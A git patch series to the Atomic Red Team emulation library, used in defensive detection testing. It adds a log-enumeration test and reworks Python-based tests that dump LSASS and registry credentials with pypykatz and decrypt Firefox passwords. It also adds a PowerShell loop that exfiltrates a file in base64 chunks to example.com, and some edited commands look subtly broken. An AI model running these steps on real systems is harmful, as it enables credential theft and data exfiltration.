Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.011/T1574.011.md"}]},{"techniqueID":"T1574.012","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.012/T1574.012.md"}]},{"techniqueID":"T1580","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1580/T1580.md"}]},{"techniqueID":"T1592","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1592/T1592.md"}]},{"techniqueID":"T1592.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1592.001/T1592.001.md"}]},{"techniqueID":"T1606","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1606/T1606.md"}]},{"techniqueID":"T1606.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1606.002/T1606.002.md"}]},{"techniqueID":"T1609","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1609/T1609.md"}]},{"techniqueID":"T1610","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1610/T1610.md"}]},{"techniqueID":"T1611","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1611/T1611.md"}]},{"techniqueID":"T1612","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1612/T1612.md"}]},{"techniqueID":"T1613","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1613/T1613.md"}]},{"techniqueID":"T1614","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1614/T1614.md"}]},{"techniqueID":"T1614.001","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1614.001/T1614.001.md"}]},{"techniqueID":"T1615","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1615/T1615.md"}]},{"techniqueID":"T1619","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1619/T1619.md"}]},{"techniqueID":"T1620","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1620/T1620.md"}]},{"techniqueID":"T1647","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1647/T1647.md"}]},{"techniqueID":"T1649","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1649/T1649.md"}]},{"techniqueID":"T1654","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1654/T1654.md"}]}]} \ No newline at end of file diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv index 170fd6d2cd..2a69beb328 100644 --- a/atomics/Indexes/Indexes-CSV/index.csv +++ b/atomics/Indexes/Indexes-CSV/index.csv @@ -1724,6 +1724,7 @@ discovery,T1049,System Network Connections Discovery,3,"System Network Connectio discovery,T1049,System Network Connections Discovery,4,System Discovery using SharpView,96f974bb-a0da-4d87-a744-ff33e73367e9,powershell discovery,T1619,Cloud Storage Object Discovery,1,AWS S3 Enumeration,3c7094f8-71ec-4917-aeb8-a633d7ec4ef5,sh discovery,T1654,Log Enumeration,1,Get-EventLog To Enumerate Windows Security Log,a9030b20-dd4b-4405-875e-3462c6078fdc,powershell +discovery,T1654,Log Enumeration,2,Enumerate Windows Security Log via WevtUtil,fef0ace1-3550-4bf1-a075-9fea55a778dd,command_prompt discovery,T1057,Process Discovery,1,Process Discovery - ps,4ff64f0b-aaf2-4866-b39d-38d9791407cc,sh discovery,T1057,Process Discovery,2,Process Discovery - tasklist,c5806a4f-62b8-4900-980b-c7ec004e9908,command_prompt discovery,T1057,Process Discovery,3,Process Discovery - Get-Process,3b3809b6-a54b-4f5b-8aff-cb51f2e97b34,powershell diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv index 5856731b37..e6fd7d3be5 100644 --- a/atomics/Indexes/Indexes-CSV/windows-index.csv +++ b/atomics/Indexes/Indexes-CSV/windows-index.csv @@ -1140,6 +1140,7 @@ discovery,T1049,System Network Connections Discovery,1,System Network Connection discovery,T1049,System Network Connections Discovery,2,System Network Connections Discovery with PowerShell,f069f0f1-baad-4831-aa2b-eddac4baac4a,powershell discovery,T1049,System Network Connections Discovery,4,System Discovery using SharpView,96f974bb-a0da-4d87-a744-ff33e73367e9,powershell discovery,T1654,Log Enumeration,1,Get-EventLog To Enumerate Windows Security Log,a9030b20-dd4b-4405-875e-3462c6078fdc,powershell +discovery,T1654,Log Enumeration,2,Enumerate Windows Security Log via WevtUtil,fef0ace1-3550-4bf1-a075-9fea55a778dd,command_prompt discovery,T1057,Process Discovery,2,Process Discovery - tasklist,c5806a4f-62b8-4900-980b-c7ec004e9908,command_prompt discovery,T1057,Process Discovery,3,Process Discovery - Get-Process,3b3809b6-a54b-4f5b-8aff-cb51f2e97b34,powershell discovery,T1057,Process Discovery,4,Process Discovery - get-wmiObject,b51239b4-0129-474f-a2b4-70f855b9f2c2,powershell diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md index fd953ca94c..98a89eb663 100644 --- a/atomics/Indexes/Indexes-Markdown/index.md +++ b/atomics/Indexes/Indexes-Markdown/index.md @@ -2381,6 +2381,7 @@ - Atomic Test #1: AWS S3 Enumeration [iaas:aws] - [T1654 Log Enumeration](../../T1654/T1654.md) - Atomic Test #1: Get-EventLog To Enumerate Windows Security Log [windows] + - Atomic Test #2: Enumerate Windows Security Log via WevtUtil [windows] - T1087.004 Cloud Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1057 Process Discovery](../../T1057/T1057.md) - Atomic Test #1: Process Discovery - ps [linux, macos] diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md index 87339692e8..0b98be71d4 100644 --- a/atomics/Indexes/Indexes-Markdown/windows-index.md +++ b/atomics/Indexes/Indexes-Markdown/windows-index.md @@ -1651,6 +1651,7 @@ - T1497 Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1654 Log Enumeration](../../T1654/T1654.md) - Atomic Test #1: Get-EventLog To Enumerate Windows Security Log [windows] + - Atomic Test #2: Enumerate Windows Security Log via WevtUtil [windows] - [T1057 Process Discovery](../../T1057/T1057.md) - Atomic Test #2: Process Discovery - tasklist [windows] - Atomic Test #3: Process Discovery - Get-Process [windows] diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index 3a56c2eddf..52be490327 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -97822,6 +97822,20 @@ discovery: Ignore" name: powershell elevation_required: true + - name: Enumerate Windows Security Log via WevtUtil + auto_generated_guid: fef0ace1-3550-4bf1-a075-9fea55a778dd + description: "WevtUtil is a command line tool that can be utilised by adversaries + to gather intelligence on a targeted Windows system's logging infrastructure. + \n\nBy executing this command, malicious actors can enumerate all available + event logs, including both default logs such as Application, Security, and + System\nas well as any custom logs created by administrators. \n\nThis information + provides valuable insight into the system's logging mechanisms, potentially + allowing attackers to identify gaps or weaknesses in the logging configuration" + supported_platforms: + - windows + executor: + command: wevtutil enum-logs + name: command_prompt T1087.004: technique: x_mitre_platforms: diff --git a/atomics/Indexes/windows-index.yaml b/atomics/Indexes/windows-index.yaml index 00c4225656..f662d099ab 100644 --- a/atomics/Indexes/windows-index.yaml +++ b/atomics/Indexes/windows-index.yaml @@ -79723,6 +79723,20 @@ discovery: Ignore" name: powershell elevation_required: true + - name: Enumerate Windows Security Log via WevtUtil + auto_generated_guid: fef0ace1-3550-4bf1-a075-9fea55a778dd + description: "WevtUtil is a command line tool that can be utilised by adversaries + to gather intelligence on a targeted Windows system's logging infrastructure. + \n\nBy executing this command, malicious actors can enumerate all available + event logs, including both default logs such as Application, Security, and + System\nas well as any custom logs created by administrators. \n\nThis information + provides valuable insight into the system's logging mechanisms, potentially + allowing attackers to identify gaps or weaknesses in the logging configuration" + supported_platforms: + - windows + executor: + command: wevtutil enum-logs + name: command_prompt T1087.004: technique: x_mitre_platforms: diff --git a/atomics/T1654/T1654.md b/atomics/T1654/T1654.md index 44a7cfabe5..da649736ad 100644 --- a/atomics/T1654/T1654.md +++ b/atomics/T1654/T1654.md @@ -10,6 +10,8 @@ Adversaries may also target centralized logging infrastructure such as SIEMs. Lo - [Atomic Test #1 - Get-EventLog To Enumerate Windows Security Log](#atomic-test-1---get-eventlog-to-enumerate-windows-security-log) +- [Atomic Test #2 - Enumerate Windows Security Log via WevtUtil](#atomic-test-2---enumerate-windows-security-log-via-wevtutil) +
@@ -47,4 +49,37 @@ powershell -c "remove-item $env:temp\T1654_events.txt -ErrorAction Ignore" +
+
+ +## Atomic Test #2 - Enumerate Windows Security Log via WevtUtil +WevtUtil is a command line tool that can be utilised by adversaries to gather intelligence on a targeted Windows system's logging infrastructure. + +By executing this command, malicious actors can enumerate all available event logs, including both default logs such as Application, Security, and System +as well as any custom logs created by administrators. + +This information provides valuable insight into the system's logging mechanisms, potentially allowing attackers to identify gaps or weaknesses in the logging configuration + +**Supported Platforms:** Windows + + +**auto_generated_guid:** fef0ace1-3550-4bf1-a075-9fea55a778dd + + + + + + +#### Attack Commands: Run with `command_prompt`! + + +```cmd +wevtutil enum-logs +``` + + + + + +
From edea9065484b174ad2a327b784092739f333694d Mon Sep 17 00:00:00 2001 From: Jake H Date: Mon, 26 Feb 2024 15:19:26 +0000 Subject: [PATCH 35/41] Implementation of venv into Windows Python atomics (#2703) * Improve pip handling (#1) * virtual env added to T1018, tested and confirmed working * virtual env added to T1003.001, tested and confirmed working * virtual env added to T1555.003, tested and confirmed working * Removing pip-autoremove installation as not required * updating atomics count in README.md [ci skip] --------- Co-authored-by: Hare Sudhan Co-authored-by: Carrie Roberts Co-authored-by: publish bot --- README.md | 2 +- atomics/T1003.001/T1003.001.yaml | 35 +++++++++++++------------ atomics/T1003.002/T1003.002.yaml | 34 ++++++++++++++---------- atomics/T1018/T1018.yaml | 24 ++++++++--------- atomics/T1046/T1046.yaml | 2 +- atomics/T1059.006/T1059.006.yaml | 1 + atomics/T1555.003/T1555.003.yaml | 45 +++++++++++++++----------------- 7 files changed, 75 insertions(+), 68 deletions(-) diff --git a/README.md b/README.md index 38fbbff467..890a3f7090 100644 --- a/README.md +++ b/README.md @@ -2,7 +2,7 @@ # Atomic Red Team -![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/validate-atomics.yml/badge.svg?branch=master) ![Atomics](https://img.shields.io/badge/Atomics-1521-flat.svg) ![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/generate-docs.yml/badge.svg?branch=master) +![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/validate-atomics.yml/badge.svg?branch=master) ![Atomics](https://img.shields.io/badge/Atomics-1522-flat.svg) ![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/generate-docs.yml/badge.svg?branch=master) Atomic Red Team™ is a library of tests mapped to the [MITRE ATT&CK®](https://attack.mitre.org/) framework. Security teams can use diff --git a/atomics/T1003.001/T1003.001.yaml b/atomics/T1003.001/T1003.001.yaml index 8ade357833..5b92a022cd 100644 --- a/atomics/T1003.001/T1003.001.yaml +++ b/atomics/T1003.001/T1003.001.yaml @@ -186,40 +186,43 @@ atomic_tests: Python 3 must be installed, use the get_prereq_command's to meet the prerequisites for this test. Successful execution of this test will display multiple usernames and passwords/hashes to the screen. + + Will create a Python virtual environment within the External Payloads folder that can be deleted manually post test execution. + supported_platforms: - windows - dependency_executor_name: command_prompt + input_arguments: + venv_path: + description: Path to the folder for the tactics venv + type: string + default: PathToAtomicsFolder\..\ExternalPayloads\venv_t1003_001 + dependency_executor_name: powershell dependencies: - description: | Computer must have python 3 installed prereq_command: | - py -3 --version >nul 2>&1 - exit /b %errorlevel% + if (Get-Command py -errorAction SilentlyContinue) { exit 0 } else { exit 1 } get_prereq_command: | New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction ignore -Force | Out-Null invoke-webrequest "https://www.python.org/ftp/python/3.10.4/python-3.10.4-amd64.exe" -outfile "PathToAtomicsFolder\..\ExternalPayloads\python_setup.exe" Start-Process -FilePath "PathToAtomicsFolder\..\ExternalPayloads\python_setup.exe" -ArgumentList "/quiet InstallAllUsers=1 PrependPath=1 Include_test=0" -Wait - description: | - Computer must have pip installed + Computer must have venv configured at #{venv_path} prereq_command: | - py -3 -m pip --version >nul 2>&1 - exit /b %errorlevel% + if (Test-Path -Path "#{venv_path}") { exit 0 } else { exit 1 } get_prereq_command: | - New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction ignore -Force | Out-Null - invoke-webrequest "https://bootstrap.pypa.io/ez_setup.py" -outfile "PathToAtomicsFolder\..\ExternalPayloads\ez_setup.py" - invoke-webrequest "https://bootstrap.pypa.io/get-pip.py" -outfile "PathToAtomicsFolder\..\ExternalPayloads\get-pip.py" - cmd /c "PathToAtomicsFolder\..\ExternalPayloads\ez_setup.py" - cmd /c "PathToAtomicsFolder\..\ExternalPayloads\get-pip.py" + py -m venv "#{venv_path}" - description: | - pypykatz must be installed and part of PATH + pypykatz must be installed prereq_command: | - pypykatz -h >nul 2>&1 - exit /b %errorlevel% + if (Get-Command "#{venv_path}\Scripts\pypykatz" -errorAction SilentlyContinue) { exit 0 } else { exit 1 } get_prereq_command: | - pip install pypykatz + & "#{venv_path}\Scripts\pip.exe" install --no-cache-dir pypykatz 2>&1 | Out-Null executor: command: | - pypykatz live lsa + "#{venv_path}\Scripts\pypykatz" live lsa + cleanup_command: | + del "%temp%\nanodump.dmp" > nul 2> nul name: command_prompt elevation_required: true - name: Dump LSASS.exe Memory using Out-Minidump.ps1 diff --git a/atomics/T1003.002/T1003.002.yaml b/atomics/T1003.002/T1003.002.yaml index 406889a564..5b7ea97079 100644 --- a/atomics/T1003.002/T1003.002.yaml +++ b/atomics/T1003.002/T1003.002.yaml @@ -25,35 +25,41 @@ atomic_tests: - name: Registry parse with pypykatz auto_generated_guid: a96872b2-cbf3-46cf-8eb4-27e8c0e85263 description: | - Parses registry hives to obtain stored credentials + Parses registry hives to obtain stored credentials. + + Will create a Python virtual environment within the External Payloads folder that can be deleted manually post test execution. supported_platforms: - windows - dependency_executor_name: command_prompt + input_arguments: + venv_path: + description: Path to the folder for the tactics venv + type: string + default: PathToAtomicsFolder\..\ExternalPayloads\venv_t1003_002 + dependency_executor_name: powershell dependencies: - description: | Computer must have python 3 installed prereq_command: | - py -3 --version >nul 2>&1 - exit /b %errorlevel% + if (Get-Command py -errorAction SilentlyContinue) { exit 0 } else { exit 1 } get_prereq_command: | - echo "Python 3 must be installed manually" + New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction ignore -Force | Out-Null + invoke-webrequest "https://www.python.org/ftp/python/3.10.4/python-3.10.4-amd64.exe" -outfile "PathToAtomicsFolder\..\ExternalPayloads\python_setup.exe" + Start-Process -FilePath "PathToAtomicsFolder\..\ExternalPayloads\python_setup.exe" -ArgumentList "/quiet InstallAllUsers=1 PrependPath=1 Include_test=0" -Wait - description: | - Computer must have pip installed + Computer must have venv configured at #{venv_path} prereq_command: | - py -3 -m pip --version >nul 2>&1 - exit /b %errorlevel% + if (Test-Path -Path "#{venv_path}") { exit 0 } else { exit 1 } get_prereq_command: | - echo "PIP must be installed manually" + py -m venv "#{venv_path}" - description: | - pypykatz must be installed and part of PATH + pypykatz must be installed prereq_command: | - pypykatz -h >nul 2>&1 - exit /b %errorlevel% + if (Get-Command "#{venv_path}\Scripts\pypykatz" -errorAction SilentlyContinue) { exit 0 } else { exit 1 } get_prereq_command: | - pip install pypykatz + & "#{venv_path}\Scripts\pip.exe" install --no-cache-dir pypykatz 2>&1 | Out-Null executor: command: | - pypykatz live registry + "#{venv_path}\Scripts\pypykatz" live lsa name: command_prompt elevation_required: true - name: esentutl.exe SAM copy diff --git a/atomics/T1018/T1018.yaml b/atomics/T1018/T1018.yaml index dc09fa60f8..b7786b298b 100644 --- a/atomics/T1018/T1018.yaml +++ b/atomics/T1018/T1018.yaml @@ -166,35 +166,35 @@ atomic_tests: description: hostname or ip address to connect to. type: string default: "192.168.1.1" + venv_path: + description: Path to the folder for the tactics venv + type: string + default: PathToAtomicsFolder\..\ExternalPayloads\venv_t1018 dependency_executor_name: powershell dependencies: - description: | Computer must have python 3 installed prereq_command: | - if (python --version) {exit 0} else {exit 1} + if (Get-Command py -errorAction SilentlyContinue) { exit 0 } else { exit 1 } get_prereq_command: | New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction ignore -Force | Out-Null invoke-webrequest "https://www.python.org/ftp/python/3.10.4/python-3.10.4-amd64.exe" -outfile "PathToAtomicsFolder\..\ExternalPayloads\python_setup.exe" Start-Process -FilePath "PathToAtomicsFolder\..\ExternalPayloads\python_setup.exe" -ArgumentList "/quiet InstallAllUsers=1 PrependPath=1 Include_test=0" -Wait - description: | - Computer must have pip installed + Computer must have venv configured at #{venv_path} prereq_command: | - if (pip3 -V) {exit 0} else {exit 1} + if (Test-Path -Path "#{venv_path}" ) { exit 0 } else { exit 1 } get_prereq_command: | - New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction ignore -Force | Out-Null - invoke-webrequest "https://bootstrap.pypa.io/ez_setup.py" -outfile "PathToAtomicsFolder\..\ExternalPayloads\ez_setup.py" - invoke-webrequest "https://bootstrap.pypa.io/get-pip.py" -outfile "PathToAtomicsFolder\..\ExternalPayloads\get-pip.py" - cmd /c "PathToAtomicsFolder\..\ExternalPayloads\ez_setup.py" - cmd /c "PathToAtomicsFolder\..\ExternalPayloads\get-pip.py" + py -m venv "#{venv_path}" - description: | - adidnsdump must be installed and part of PATH + adidnsdump must be installed prereq_command: | - if (cmd /c adidnsdump -h) {exit 0} else {exit 1} + if (Get-Command "#{venv_path}\Scripts\adidnsdump" -errorAction SilentlyContinue) { exit 0 } else { exit 1 } get_prereq_command: | - pip3 install adidnsdump + & "#{venv_path}\Scripts\pip.exe" install --no-cache-dir adidnsdump 2>&1 | Out-Null executor: command: | - adidnsdump -u #{user_name} -p #{acct_pass} --print-zones #{host_name} + "#{venv_path}\Scripts\adidnsdump" -u #{user_name} -p #{acct_pass} --print-zones #{host_name} name: command_prompt elevation_required: true - name: Adfind - Enumerate Active Directory Computer Objects diff --git a/atomics/T1046/T1046.yaml b/atomics/T1046/T1046.yaml index f3e32093a7..6633b73f41 100644 --- a/atomics/T1046/T1046.yaml +++ b/atomics/T1046/T1046.yaml @@ -115,7 +115,7 @@ atomic_tests: - description: | Check if python exists on the machine prereq_command: | - if (python --version) {exit 0} else {exit 1} + if (Get-Command py -errorAction SilentlyContinue) { exit 0 } else { exit 1 } get_prereq_command: | New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction ignore -Force | Out-Null invoke-webrequest "https://www.python.org/ftp/python/3.10.4/python-3.10.4-amd64.exe" -outfile "PathToAtomicsFolder\..\ExternalPayloads\python_setup.exe" diff --git a/atomics/T1059.006/T1059.006.yaml b/atomics/T1059.006/T1059.006.yaml index 14b8c5c9cc..cf447b8d48 100644 --- a/atomics/T1059.006/T1059.006.yaml +++ b/atomics/T1059.006/T1059.006.yaml @@ -38,6 +38,7 @@ atomic_tests: name: sh cleanup_command: | rm #{payload_file_name} + pip-autoremove pypykatz >nul 2> nul - name: 'Execute Python via scripts' auto_generated_guid: 6c4d1dcb-33c7-4c36-a8df-c6cfd0408be8 description: Create Python file (.py) that downloads and executes shell script via executor arguments diff --git a/atomics/T1555.003/T1555.003.yaml b/atomics/T1555.003/T1555.003.yaml index 9b18849792..0f8976d1ab 100644 --- a/atomics/T1555.003/T1555.003.yaml +++ b/atomics/T1555.003/T1555.003.yaml @@ -200,13 +200,15 @@ atomic_tests: description: | Firepwd.py is a script that can decrypt Mozilla (Thunderbird, Firefox) passwords. Upon successful execution, the decrypted credentials will be output to a text file, as well as displayed on screen. + + Will create a Python virtual environment within the External Payloads folder that can be deleted manually post test execution. supported_platforms: - windows input_arguments: Firepwd_Path: description: Filepath for Firepwd.py type: string - default: PathToAtomicsFolder\..\ExternalPayloads\Firepwd.py + default: PathToAtomicsFolder\..\ExternalPayloads\venv_t1555.004\Scripts\Firepwd.py Out_Filepath: description: Filepath to output results to type: string @@ -219,15 +221,12 @@ atomic_tests: description: Filepath to python type: string default: C:\Program Files\Python310\python.exe + venv_path: + description: Path to the folder for the tactics venv + type: string + default: PathToAtomicsFolder\..\ExternalPayloads\venv_t1555.004 dependency_executor_name: powershell dependencies: - - description: | - Firepwd must exist at #{Firepwd_Path} - prereq_command: | - if (Test-Path "#{Firepwd_Path}") {exit 0} else {exit 1} - get_prereq_command: | - New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction ignore -Force | Out-Null - Invoke-WebRequest "https://raw.githubusercontent.com/lclevy/firepwd/167eabf3b88d5a7ba8b8bc427283f827b6885982/firepwd.py" -outfile "#{Firepwd_Path}" - description: | Firefox profile directory must be present prereq_command: | @@ -257,37 +256,35 @@ atomic_tests: invoke-webrequest "https://www.python.org/ftp/python/3.10.4/python-3.10.4-amd64.exe" -outfile "PathToAtomicsFolder\..\ExternalPayloads\python_setup.exe" Start-Process -FilePath "PathToAtomicsFolder\..\ExternalPayloads\python_setup.exe" -ArgumentList "/quiet InstallAllUsers=1 PrependPath=1 Include_test=0" -Wait - description: | - Pip must be installed. + Computer must have venv configured at #{venv_path} prereq_command: | - $env:Path = [System.Environment]::ExpandEnvironmentVariables([System.Environment]::GetEnvironmentVariable("Path","Machine") + ";" + [System.Environment]::GetEnvironmentVariable("Path","User")) - if (pip -v) {exit 0} else {exit 1} + if (Test-Path -Path "#{venv_path}") { exit 0 } else { exit 1 } + get_prereq_command: | + py -m venv "#{venv_path}" + - description: | + Firepwd must exist at #{Firepwd_Path} + prereq_command: | + if (Test-Path "#{Firepwd_Path}") {exit 0} else {exit 1} get_prereq_command: | New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction ignore -Force | Out-Null - invoke-webrequest "https://bootstrap.pypa.io/ez_setup.py" -outfile "PathToAtomicsFolder\..\ExternalPayloads\ez_setup.py" - invoke-webrequest "https://bootstrap.pypa.io/get-pip.py" -outfile "PathToAtomicsFolder\..\ExternalPayloads\get-pip.py" - cmd /c "PathToAtomicsFolder\..\ExternalPayloads\ez_setup.py" - cmd /c "PathToAtomicsFolder\..\ExternalPayloads\get-pip.py" + Invoke-WebRequest "https://raw.githubusercontent.com/lclevy/firepwd/167eabf3b88d5a7ba8b8bc427283f827b6885982/firepwd.py" -outfile "#{Firepwd_Path}" - description: | Pycryptodome library must be installed prereq_command: | - $env:Path = [System.Environment]::ExpandEnvironmentVariables([System.Environment]::GetEnvironmentVariable("Path","Machine") + ";" + [System.Environment]::GetEnvironmentVariable("Path","User")) - if (pip show pycryptodome) {exit 0} else {exit 1} + if (#{venv_path}\Scripts\pip.exe show pycryptodome) {exit 0} else {exit 1} get_prereq_command: | - $env:Path = [System.Environment]::ExpandEnvironmentVariables([System.Environment]::GetEnvironmentVariable("Path","Machine") + ";" + [System.Environment]::GetEnvironmentVariable("Path","User")) - if (test-path "#{VS_CMD_Path}"){pip install pycryptodome | out-null | cmd /c %comspec% /k "#{VS_CMD_Path}" | out-null} else {write-host "Visual Studio Build Tools (C++ Support) must be installed to continue gathering this prereq"} + if (test-path "#{VS_CMD_Path}"){#{venv_path}\Scripts\pip.exe install pycryptodome | out-null | cmd /c %comspec% /k "#{VS_CMD_Path}" | out-null} else {write-host "Visual Studio Build Tools (C++ Support) must be installed to continue gathering this prereq"} - description: | Pyasn1 library must be installed prereq_command: | - $env:Path = [System.Environment]::ExpandEnvironmentVariables([System.Environment]::GetEnvironmentVariable("Path","Machine") + ";" + [System.Environment]::GetEnvironmentVariable("Path","User")) - if (pip show pyasn1) {exit 0} else {exit 1} + if (#{venv_path}\Scripts\pip.exe show pyasn1) {exit 0} else {exit 1} get_prereq_command: | - $env:Path = [System.Environment]::ExpandEnvironmentVariables([System.Environment]::GetEnvironmentVariable("Path","Machine") + ";" + [System.Environment]::GetEnvironmentVariable("Path","User")) - if (test-path "#{VS_CMD_Path}"){pip install pyasn1 | out-null | cmd /c %comspec% /k "#{VS_CMD_Path}" | out-null} else {write-host "Visual Studio Build Tools (C++ Support) must be installed to continue gathering this prereq."} + if (test-path "#{VS_CMD_Path}") & {#{venv_path}\Scripts\pip.exe install pyasn1 | out-null | cmd /c %comspec% /k "#{VS_CMD_Path}" | out-null} else {write-host "Visual Studio Build Tools (C++ Support) must be installed to continue gathering this prereq."} executor: name: powershell command: | $PasswordDBLocation = get-childitem -path "$env:appdata\Mozilla\Firefox\Profiles\*.default-release\" - cmd /c #{Firepwd_Path} -d $PasswordDBLocation > #{Out_Filepath} + cmd /c #{venv_path}\Scripts\python.exe #{Firepwd_Path} -d $PasswordDBLocation > #{Out_Filepath} cat #{Out_Filepath} cleanup_command: | Remove-Item -Path "#{Out_Filepath}" -erroraction silentlycontinue From b16650761432417386e32c2a49d3f1c8324b9da4 Mon Sep 17 00:00:00 2001 From: sai prashanth pulisetti <40313110+prashanthpulisetti@users.noreply.github.com> Date: Mon, 26 Feb 2024 20:53:55 +0530 Subject: [PATCH 36/41] Update T1030.yaml Network-Based Data Transfer in Small Chunks (#2658) * Update T1030.yaml Network-Based Data Transfer in Small Chunks # Atomic Test # - T1030 - Data Transfer Size Limits: Network-Based Data Transfer in Small Chunks ## Objective Simulate the technique of transferring data over a network in small chunks to evade size-based detection mechanisms. ## Description This test involves transferring data over a network (either to a controlled external endpoint like `example.com`) in small, segmented sizes. This simulates an adversary's behavior in conducting stealthy data exfiltration. * Update T1030.yaml * Update T1030.yaml removed clean up commands and detection * Update T1030.yaml * Update T1030.yaml updated guid * Update T1030.yaml * Update T1030.yaml updated intendents * Update T1030.yaml --------- Co-authored-by: Hare Sudhan Co-authored-by: Carrie Roberts --- atomics/T1030/T1030.yaml | 32 ++++++++++++++++++++++++++++++++ 1 file changed, 32 insertions(+) diff --git a/atomics/T1030/T1030.yaml b/atomics/T1030/T1030.yaml index 1497fb077a..50e2aa617a 100644 --- a/atomics/T1030/T1030.yaml +++ b/atomics/T1030/T1030.yaml @@ -31,3 +31,35 @@ atomic_tests: cleanup_command: | if [ -f #{folder_path}/safe_to_delete ]; then rm -rf #{folder_path}; fi; name: sh + +- name: Network-Based Data Transfer in Small Chunks + auto_generated_guid: "8ce53049-5314-4279-b635-b69c5bed3a36" + description: "Simulate transferring data over a network in small chunks to evade detection." + supported_platforms: + - "windows" + input_arguments: + source_file_path: + description: "Path to the source file to transfer." + type: path + default: "[User specified]" + destination_url: + description: "URL of the destination server." + type: url + default: "http://example.com" + chunk_size: + description: "Size of each data chunk (in KB)." + type: integer + default: 1024 + executor: + name: powershell + elevation_required: false + command: | + $file = [System.IO.File]::OpenRead(#{source_file_path}) + $chunkSize = #{chunk_size} * 1KB + $buffer = New-Object Byte[] $chunkSize + + while ($bytesRead = $file.Read($buffer, 0, $buffer.Length)) { + $encodedChunk = [Convert]::ToBase64String($buffer, 0, $bytesRead) + Invoke-WebRequest -Uri #{destination_url} -Method Post -Body $encodedChunk + } + $file.Close() From c09d2a3748047c44796ce3028e7f56a3bdfb6ba0 Mon Sep 17 00:00:00 2001 From: Atomic Red Team GUID generator Date: Mon, 26 Feb 2024 15:24:32 +0000 Subject: [PATCH 37/41] Generate GUIDs from job=generate-docs branch=master [skip ci] --- atomics/T1030/T1030.yaml | 2 +- atomics/used_guids.txt | 2 ++ 2 files changed, 3 insertions(+), 1 deletion(-) diff --git a/atomics/T1030/T1030.yaml b/atomics/T1030/T1030.yaml index 50e2aa617a..02989e8dda 100644 --- a/atomics/T1030/T1030.yaml +++ b/atomics/T1030/T1030.yaml @@ -33,7 +33,7 @@ atomic_tests: name: sh - name: Network-Based Data Transfer in Small Chunks - auto_generated_guid: "8ce53049-5314-4279-b635-b69c5bed3a36" + auto_generated_guid: f0287b58-f4bc-40f6-87eb-692e126e7f8f description: "Simulate transferring data over a network in small chunks to evade detection." supported_platforms: - "windows" diff --git a/atomics/used_guids.txt b/atomics/used_guids.txt index a01fb1e73e..63fdad212e 100644 --- a/atomics/used_guids.txt +++ b/atomics/used_guids.txt @@ -1568,3 +1568,5 @@ ed6c2c87-bba6-4a28-ac6e-c8af3d6c2ab5 36c62584-d360-41d6-886f-d194654be7c2 bac8a340-be64-4491-a0cc-0985cb227f5a fef0ace1-3550-4bf1-a075-9fea55a778dd +8ce53049-5314-4279-b635-b69c5bed3a36 